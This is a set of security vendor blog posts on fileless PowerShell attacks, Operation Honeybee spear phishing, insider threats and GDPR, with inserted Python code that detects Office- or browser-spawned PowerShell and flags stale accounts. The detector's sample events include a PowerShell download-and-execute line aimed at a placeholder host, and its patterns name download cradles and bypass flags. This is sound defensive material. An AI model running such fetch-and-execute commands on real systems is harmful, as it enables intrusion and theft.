Fileless Attacks: How do you protect your organisation from a threat you can’t see?

Fileless Attacks: The Threat You Can’t See

Fileless attacks are on the rise. A study by the Ponemon Institute found that 29% of the attacks faced by organisations during 2017 were fileless. This number has been increasing year on year and is expected to reach 35% in 2018.

The reason for this increase is simple. Hackers know they stand a greater chance of succeeding with a fileless attack because they are more difficult to detect. Traditional anti-malware and anti-virus tools search for malicious software by scanning a computer’s hard drive. This has led cybercriminals to pursue attacks that avoid the hard drive altogether.

How do fileless attacks work?

To avoid the hard drive, hackers hide malicious code in memory instead, using authorised native programs and tools within the operating system to attack by stealth.

This is how an attack against your organisation could occur:

  1. An employee receives a spam email with a link to a malicious website.
  2. The employee clicks on the link.
  3. The malicious website loads an authorised program, such as Flash, on the employee’s computer and exploits its known vulnerabilities.
  4. The program then opens Windows PowerShell, a native Windows tool, which is able to execute instructions through the command line while operating in memory.
  5. PowerShell downloads and runs a malicious script.
  6. The PowerShell script locates data on the employee’s computer and sends it to the attacker.

Using authorised applications already installed on the target’s computer is more discreet than placing a file on it. The hacker can carry out the same types of attack as they otherwise could, such as ransomware, but is far less likely to be noticed. This is why it is essential to patch and update your operating systems and software applications promptly.

Although not truly a ‘fileless’ attack, the same attack could occur if an employee opens a Word or PDF document sent from a malicious source. With a Word document, for instance, the attack uses a Microsoft Office macro to launch PowerShell and run the hacker’s script. Programs such as Adobe PDF Reader, and technologies such as JavaScript, all have known vulnerabilities which hackers seek to use to their advantage.

Fileless attacks will continue to rise until organisations become effective at identifying and defending themselves from this type of attack. Cybersecurity tools that learn and analyse patterns of behaviour are better placed to spot unusual activity on your networks, which could afford some protection against fileless attacks.
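The behaviour-based detection this paragraph refers to can be made concrete. The following is an added example, not code from the article or from any Digital Pathways product: it scores process-creation events for the two launch paths described above (an exploited browser plug-in or an Office macro starting PowerShell, which then fetches and runs a script in memory). The event records are constructed to resemble Windows process-creation logs (Sysmon Event ID 1 or Security Event ID 4688) already parsed into dictionaries; the field names, the weights and the base64 after `-enc` are all assumptions or placeholders.

```python
"""Process-tree heuristics for the fileless chain described in the article.

Added example, not part of the original article. The events below are
constructed to resemble Windows process-creation records (Sysmon Event ID 1
or Security Event ID 4688) already parsed into dictionaries; the field names
are an assumption, not any product's real schema.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Interactive, user-facing programs that rarely have a legitimate reason to
# launch a script host on a workstation: Office for the macro variant,
# browsers and Reader for the exploited-plug-in variant in the text.
USER_FACING_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "acrord32.exe", "iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe",
}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line features that point at in-memory execution rather than a
# script file on disk. The weights are a tuning starting point, not a standard.
CMDLINE_FEATURES = [
    ("encoded_command", 2, re.compile(r"(?i)-e(?:c|nc(?:odedcommand)?)?\b")),
    ("download_cradle", 2, re.compile(
        r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|invoke-restmethod")),
    ("invoke_expression", 1, re.compile(r"(?i)\biex\b|invoke-expression")),
    ("hidden_window", 1, re.compile(r"(?i)-w(?:in(?:dowstyle)?)?\s+hidden")),
    ("policy_bypass", 1, re.compile(r"(?i)-ex\w*\s+bypass")),
]
# A user-facing parent alone reaches the threshold; command-line features on
# their own need more than one strong hit, because admins use some of them.
ALERT_THRESHOLD = 3


@dataclass
class Finding:
    event_id: int
    score: int
    reasons: List[str] = field(default_factory=list)


def score_event(ev: Dict[str, object]) -> Finding:
    """Score one process-creation event; higher means more like the chain above."""
    parent = str(ev["parent_image"]).rsplit("\\", 1)[-1].lower()
    child = str(ev["image"]).rsplit("\\", 1)[-1].lower()
    cmdline = str(ev.get("command_line", ""))
    finding = Finding(event_id=int(ev["id"]), score=0)

    # Steps 3 and 4 of the chain: the exploited program (or the Office macro)
    # is what launches the script host. That parent/child relationship is the
    # strongest single signal and is visible whatever the script contains.
    if child in SCRIPT_HOSTS and parent in USER_FACING_PARENTS:
        finding.score += 3
        finding.reasons.append(f"{parent} spawned {child}")

    # Step 5: fetch-and-run without writing a file to disk.
    if child in SCRIPT_HOSTS:
        for name, weight, pattern in CMDLINE_FEATURES:
            if pattern.search(cmdline):
                finding.score += weight
                finding.reasons.append(name)
    return finding


def find_suspicious(events, threshold: int = ALERT_THRESHOLD) -> List[Finding]:
    """Return the findings that reach the alert threshold, in event order."""
    return [f for f in map(score_event, events) if f.score >= threshold]


# Constructed sample events. The base64 after -enc is a placeholder string,
# not a real payload; example.invalid is a reserved, non-resolving domain.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc UExBQ0VIT0xERVI="},
    {"id": 2, "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/s')\""},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"},
    {"id": 4, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs -p"},
    {"id": 5, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -enc UExBQ0VIT0xERVI="},
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"event {f.event_id}: score {f.score}: {', '.join(f.reasons)}")
```

Events 1 and 2 reach the threshold from the parent/child relationship alone; the hidden window, encoded argument and download cradle then explain why. Event 5 (an encoded command launched from cmd.exe) scores 2 and is not alerted, which is the point of weighting: that pattern appears in legitimate scheduled tasks, and it is the combination with an Office or browser parent that separates the chain described above from everyday administration.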

However, relying on cybersecurity tools alone is not enough. Training staff to recognise fraudulent and spam emails also needs to be a crucial element of your cybersecurity strategy. Spam emails are becoming less obvious to spot, often looking near identical to emails from a legitimate source. The few seconds it takes an employee to check the sender’s email address is accurate could be the difference between a successful and unsuccessful attack against your company.

As new modes of threat emerge, organisations must rethink the ways they protect themselves, and analyse the cybersecurity tools they use.


Implementing responsible AI from the start

Digital Pathways’ Colin Tankard looks at how we reap the rewards of AI while avoiding the risks.

Artificial intelligence (AI) and machine learning (ML) are two very hot buzzwords right now and often seem to be used interchangeably. They are not quite the same thing, but the perception that they are can sometimes lead to confusion.

Machine learning is a type of artificial intelligence (AI) that allows software applications to become more accurate in predicting outcomes, without being explicitly programmed.

AI is the process of simulating human intelligence, using machines, especially computer systems. The process includes learning (the acquisition of information and rules for using the information), reasoning (using the rules to reach approximate or definite conclusions) and self-correction.

In smart buildings, AI is already being used to control the environmental needs of the people working within the building. For example, monitoring the volume of people in any area and using this intelligence to decide if ‘air-con’ should be switched on or if the lowering of shades or opening of windows will suffice.

Another example is the controlling of the smart building environment outside of hours, by counting the number of people in the building, or noting when unusual events happen, and acting accordingly.

All of this, and more, is with us today and will continue to expand into our daily business and personal lives.

Data security

Although the benefits look good, there is a fear that such AI programs could ‘go rogue’ and turn on us, or be hacked by other AI programs. Hackers love artificial intelligence as much as everyone else in the technology space and are increasingly using AI to improve their phishing attacks. The need for innovative and robust data security therefore becomes even more important to the management of the smart building than it is at present.

Read the full article here in Smart Cities World

Tesla Feel The Heat Of An Insider Threat

Tesla, the luxury electric car maker, seems to have fallen foul of an insider threat episode, with Elon Musk warning that a disgruntled staff member had altered the company’s IT system code, harvesting highly sensitive information and giving it to others.

Traditionally, the term ‘Insider Threat’ does indeed invoke images of malicious employees lurking in the shadows of an office, attempting to steal company secrets or bring down the system. The reality is that this form of ‘evil insider’ is infrequent at most companies (though clearly not Tesla), with instances of such threats occurring once in a ‘blue moon’. The real issue, and the biggest risk to confidential data, is the negligent employee, more commonly categorised as the ‘Unintentional Insider Threat’.

It is common that when a cyber security professional attempts to speak with C-level management about mitigating and even preventing the Insider Threat, the feedback they receive is along the lines of, ‘everyone here is happy. We don’t have disgruntled employees, so we don’t have to worry about Insider Threat!’

Perhaps that is true. But if you ‘turn the conversation on its head’ and talk about the Insider Threat as unintentional threats – employees who make mistakes and inadvertently cause harm – executives listen.

A Verizon 2015 data breach investigation report showed that ‘Insiders’ are responsible for 90% of security incidents; of these, 29% are deliberate and malicious whilst 71% are unintentional, arising from misuse of systems and log-in/log-out failures, with cloud storage leading the way.

There is no doubt that organisations that understand, address and focus on minimising the damage from the Insider Threat are going to be the companies that win. And remember, even if your technologies are not obsolete, you will still need to augment your security protocols for Insider Threats and Unintentional Insider Threats.

Read the full article here in Global Security Magazine 

How are Word-based fileless attacks targeting aid organisations?

Imagine you have opened a Word file that was emailed to you by a prominent organisation in your field. On the surface, nothing else happens. You notice no changes and your antivirus system doesn’t detect anything suspicious. Would you (or your employees) expect to be spied on by hackers?

This March, McAfee identified a new fileless hacking operation which is targeting humanitarian aid organisations worldwide. ‘Operation Honeybee’ tricks its targets into opening compromised Word documents. When this is achieved, their malware takes hold in the computer and allows the hackers to spy on their target undetected. They are able to escape scrutiny because of their fileless strategy.

There has been a surge in fileless attacks. A study by the Ponemon Institute predicts they will comprise 35% of all cyberattacks in 2018. As hard drive-focused antivirus scanners become more effective, hackers are resorting to strategies which do not leave files in your directory. Instead, they exploit known weaknesses in legitimate programs which are already on your computer. Once they have gained a foothold there, they can run commands which allow them to spy on you, mine cryptocurrency, ransom your files, and even take over your entire system.

Honeybee and spear phishing pierce your defences

Another dangerous aspect of the Honeybee operation is its use of ‘spear phishing’, a more sophisticated form of phishing. Where ordinary phishing campaigns send out misleading emails in bulk and cross their fingers, spear phishing tailors its message to appeal to a particular target in order to increase its chances of success.

In the case of Honeybee, the hackers designed their initial email to pass for a message from the International Red Cross. They then used the decoy document to ambush employees of the aid organisations they wanted to spy on.

The Red Cross is a perfect disguise for a spear phishing operation, as it is a well-known, trusted organisation. Combining this with the fileless nature of the attack, it is even more likely to escape detection. This joint strategy can be adapted to target any industry.

Joint strategy; twofold solution

If hackers are purposefully evading traditional antivirus strategies, how can you keep your system safe? There is a twofold solution.

First of all, there are innovative antivirus programs which do protect against fileless attacks. The latest cybersecurity tools use machine learning to pinpoint unusual activity on your system. This allows them to eliminate threats which would otherwise remain hidden.

Secondly, you can implement a training strategy which will increase awareness of the strategies used by hackers. When properly prepared, members of your organisation can neutralise a threat by taking as little as a minute to verify the source of emails they receive. It really can be that simple.

Every organisation can benefit from added protection. Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.


Streamlining data discovery

Understanding what unstructured data exists in the enterprise is not easy. Massive volumes of documents, spreadsheets, presentations and emails are typically scattered about an organisation.

With no real tools to manage it based on business value, it accumulates with no end in sight. The easy option is to buy more storage but that doesn’t fix the problem. Continue and you have hundreds of terabytes or petabytes of unstructured user content with no way to classify and manage the data according to its value. But by breaking it down into multiple iterative steps, starting high and working down to a level of detail to satisfy all stakeholders, order can be achieved.

Read the full article in Network Security Magazine here on page 20

Building trust: what GDPR can do for your council

In 2017, Basildon Council was fined £150,000 for failing to store personal data securely. Because there was no adequate data protection policy in place, details of a family’s disabilities, including mental health issues, were published online. They remained publicly accessible for weeks. This incident had huge reputational and financial repercussions for the Council.

The £150,000 fine was imposed under the old Data Protection Act. With the enforcement of GDPR in May, the ICO is now able to impose higher fines, of up to 4% of the organisation’s turnover or €20,000,000, whichever is greater. What’s more, the scope of the new legislation is far broader, setting higher standards of transparency for any organisation that handles EU citizens’ data.

Councils are already failing internal audits and incurring fines on an annual basis. What will happen now GDPR is enforceable? Unless action is taken now, councils stand to fall short of the new rules, and be subject to the new fines. Yet the purpose of GDPR is to protect citizens’ rights, not to cause councils to incur avoidable costs. How can GDPR help councils prevent the kind of incident Basildon has seen, and foster trust among residents?

How can GDPR help?

There is a lot of apprehension among residents regarding their privacy. Who holds my data, and why? If personal data is stored, is it being held securely? GDPR is designed to provide answers to those questions.

If an organisation is GDPR compliant, it means that personal data is only being stored when strictly necessary, and under the best possible safeguards. More than that, GDPR puts control over data back into citizens’ hands, creating a new era of transparency. This is how GDPR, instead of remaining a looming spectre, can become a tool for councils to build trust.

The task for councils is clear: they must be able to map out the exact course data takes through their systems. When a resident requests to see their personal data, the council must be able to recover it. If you imagine the amount of data currently in the hands of councils, much of it in archival storage, you will see that this is a huge undertaking.

There are other liabilities councils may not even be aware of, such as their Active Directory management. Too often, when council employees change roles, their accounts remain active. This means that they can be exploited by disgruntled ex-employees, and even become targets for hackers. By implementing a system which closes obsolete accounts, councils can ensure that access is granted only to the right people.
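A review of the kind described above can be run as a scheduled check rather than an occasional audit. The following is an added example, not code from the article or from any Digital Pathways product: it applies an inactivity policy to a set of account records constructed to carry the attributes a directory export would include (account name, enabled flag, creation date, last logon). The attribute names and the 90-day and 30-day thresholds are assumptions to be replaced by the council’s own policy.

```python
"""Stale account review for the Active Directory point made in the article.

Added example, not part of the original article or any Digital Pathways
product. The records below are constructed to look like the attributes an AD
export would carry (sAMAccountName, enabled flag, whenCreated,
lastLogonTimestamp); a real export uses your directory's attribute names.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional

INACTIVE_DAYS = 90       # no logon for this long -> candidate for disabling
NEVER_USED_GRACE = 30    # new accounts get this long before "never logged on" counts
# lastLogonTimestamp is replicated lazily and can lag the true last logon by
# up to 14 days, so the inactivity window is widened rather than trusted to the day.
REPLICATION_SLACK = timedelta(days=14)


@dataclass
class Account:
    name: str
    enabled: bool
    created: datetime
    last_logon: Optional[datetime]   # None = never logged on


@dataclass
class Review:
    name: str
    reason: str


def review_accounts(accounts: List[Account], now: datetime) -> List[Review]:
    """Return enabled accounts that the policy says should be closed, with the reason."""
    out: List[Review] = []
    for acct in accounts:
        if not acct.enabled:
            continue  # already closed; nothing to do
        if acct.last_logon is None:
            # An account that was created but never used is a liability with
            # no owner to notice misuse; give new starters a grace period only.
            age = now - acct.created
            if age > timedelta(days=NEVER_USED_GRACE):
                out.append(Review(acct.name, f"never logged on, created {age.days} days ago"))
            continue
        idle = now - acct.last_logon
        if idle > timedelta(days=INACTIVE_DAYS) + REPLICATION_SLACK:
            out.append(Review(acct.name, f"inactive for {idle.days} days"))
    return out


# Constructed sample data; names and dates are invented for the example.
NOW = datetime(2018, 6, 1, tzinfo=timezone.utc)
SAMPLE_ACCOUNTS = [
    Account("jsmith", True, datetime(2015, 3, 2, tzinfo=timezone.utc), NOW - timedelta(days=2)),
    Account("aleaver", True, datetime(2014, 9, 1, tzinfo=timezone.utc), NOW - timedelta(days=200)),
    Account("contractor7", True, NOW - timedelta(days=45), None),
    Account("newstarter", True, NOW - timedelta(days=5), None),
    Account("old_disabled", False, datetime(2012, 1, 1, tzinfo=timezone.utc), NOW - timedelta(days=400)),
    Account("borderline", True, datetime(2016, 6, 1, tzinfo=timezone.utc), NOW - timedelta(days=100)),
]

if __name__ == "__main__":
    for r in review_accounts(SAMPLE_ACCOUNTS, NOW):
        print(f"{r.name}: {r.reason}")
```

Two of the six constructed accounts are flagged: the leaver whose account has sat idle for 200 days and the contractor account that was created but never used. The 100-day account is deliberately left alone, because lastLogonTimestamp can understate recent activity by up to two weeks and disabling on a stale replica value generates service-desk calls rather than security. The output is a list for a human to action, which fits the attestation step a council would need before closing an account.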

There are big cost-saving benefits to be achieved by creating a safe, streamlined and transparent data policy. As well as avoiding fines and passing internal audits, in the process of becoming GDPR compliant, councils can effect substantial savings by reducing their storage of obsolete data.

We have the experience and expertise to reform your data management. If you are a council looking for a GDPR compliancy solution, please contact us on 0844 586 0040 or intouch@digitalpathways.co.uk.